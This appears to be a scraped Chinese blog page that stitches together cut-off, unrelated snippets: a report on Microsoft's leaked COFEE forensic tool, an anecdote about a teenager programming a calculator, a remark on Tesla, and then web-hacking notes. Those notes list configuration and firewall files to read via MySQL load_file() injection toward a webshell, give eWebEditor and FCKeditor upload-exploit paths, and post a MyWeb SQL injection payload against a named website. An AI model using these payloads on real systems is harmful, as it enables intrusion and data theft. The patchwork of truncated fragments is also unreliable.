微软的一款名为COFEE的工具近日泄漏到网上，对于很多人来说这是一款非常陌生的微软产品，这是微软向国际刑警组织免费提供的证据提取工具，并不面向普通用户推广.COFEE全称为“计算机在线法庭科学证据提取器（Computer Online Forensic Evidence Extractor）”，微软是这样描述的COFEE的：“有了COFEE，没有合适的计算机取证能力的执法机构可以轻松、可靠而且高效地收集现场证据。   一个只有最基础的计算机知识的人也可以在不超过10分钟的时间里学会如何使用配置好的COFEE设备，执法人员可以像专家一

PS：我想黑客的精神真源于此吧。

      在本杰明?穆迪(Benjamin Moody)15岁那年，父亲为了帮助儿子学数学给他买了台计算器，穆迪一下子就迷上了它。他把计算器珍藏起来，津津有味地研究起了总共19章的使用说明。

不久以后，他就在自己那台由德州仪器公司(Texas Instruments Inc.)生产的图形计算器里编写了一个打地鼠游戏(Whac-A-Mole)程序。几个月后，他又编写出了一个能在计算器1.5英寸×2.5英寸屏幕上标出星辰位置的程序。他还曾把计算器变成了电子书阅读器，尽管一次只能读上几行

尼古拉·特斯拉

在某人博客上看到的。。。百度搜索了一下。

果然是神一样的科学家。膜拜中。。。

MYSQL注入中，load_file()函数在获得webshell以及提权过程中起着十分重要的作用，常被用来读取各种配置文件，如：
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfi

ewebeditor.asp?action=stylepreview&id=14

Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp

当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示:

影响版本：
MyWeb 5.0
MyWeb 7.0

漏洞描述：
在”include”目录下，文件web_content.php文件对变量Id提交的参数没有过滤，导致存在注入漏洞。
http://www.nuanyue.com/include/web_content.php?id=80 and 1=2 union select 1,2,concat(user()),4,5,6,7,8,9,10,11,12,13–